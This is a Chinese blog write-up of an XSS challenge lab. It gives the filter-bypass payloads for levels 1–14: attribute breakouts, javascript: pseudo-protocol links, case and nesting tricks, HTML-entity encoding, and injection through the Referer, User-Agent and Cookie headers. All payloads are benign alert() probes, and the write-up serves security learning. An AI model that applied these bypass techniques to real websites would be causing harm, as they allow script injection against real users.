=&{()}进行测试发现有两个输出点...">

xss挑战赛

作者: FateKey | 来源:发表于2018-02-08 23:05 被阅读0次

    第一关

    无过滤,直接使用<script>alert(1)</script>


    1

    第二关

    '';!--"<XSS>=&{()}进行测试发现有两个输出点,第一个输出点进行了html实体化。
    ![2(https://img.haomeiwen.com/i5858942/6f09d0839c1b6937.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
    闭合掉value后使用新属性执行js(在火狐上onload无法执行 )
    " onmouseover="alert('test')

    第三关

    两处都用htmlspecialchars函数处理了,但htmlspecialchars函数默认不处理引号,所以第二处可以进行闭合引入新属性。
    ' onmouseover='alert(1)

    第四关

    4
    可以看出只是将单引号变为了双引号。闭合后添加新属性:
    " onmouseover="alert(1)

    第五关

    可以看出破坏了onmouseover标签,但输出点2没有进行任何过滤。

    5
    闭合input标签后后用a标签和javascript 伪协议绕过。
    "><a href=javascript:alert(2)>

    第六关

    6
    可以看出herf也被破坏了,但测试发现通过修改大小写可以绕过(on*标签不可以)
    " ><a hRef=javascript:alert(2)>

    第七关

    可以看出是将关键词过滤为空,考虑嵌套关键词
    " ><scripscriptt>alert(1)</scriscriptpt>

    第八关

    输出点在a标签的href属性中且引号被过滤无法进行闭合,考虑使用javascript伪协议,但关键词被过滤,因为在href属性中,所以用html编码绕过。
    &#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x32;&#x29;

    第九关

    友情链接必须包含http://,javascript被过滤,将伪协议代码html编码并在后面注释上http://
    &#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x32;&#x29;//http://

    第十关

    这关就有点坑了,一开始那个输入点没人任何办法绕过,发现有隐藏的输入点

    10
    测试后发现t_sort参数有输出点且无过滤。
    keyword=1&t_sort=1" onmouseover='alert(1)'(如果没有将input改为可见可以使用其他on*事件)

    第十一关

    进入时发现有一个隐藏的input的值为第十关的url,可以确定为refer,测试其他输入点均被过滤且无法绕过,尝试修改Referer为xss语句,成功绕过
    Referer: " onmouseover="alert(1)

    第十二关

    这次又显示浏览器信息,这次修改User-Agent
    User-Agent: " onmouseover="alert(2)

    第十三关

    这次的输入点到了cookie中,修改cookie
    Cookie: user=" onmouseover="alert(1);

    第十四关

    这关好像已经失效了,是关于exif的

    第十五关

    相关文章

      网友评论

        本文标题:xss挑战赛

        本文链接:https://www.haomeiwen.com/subject/pmuttftx.html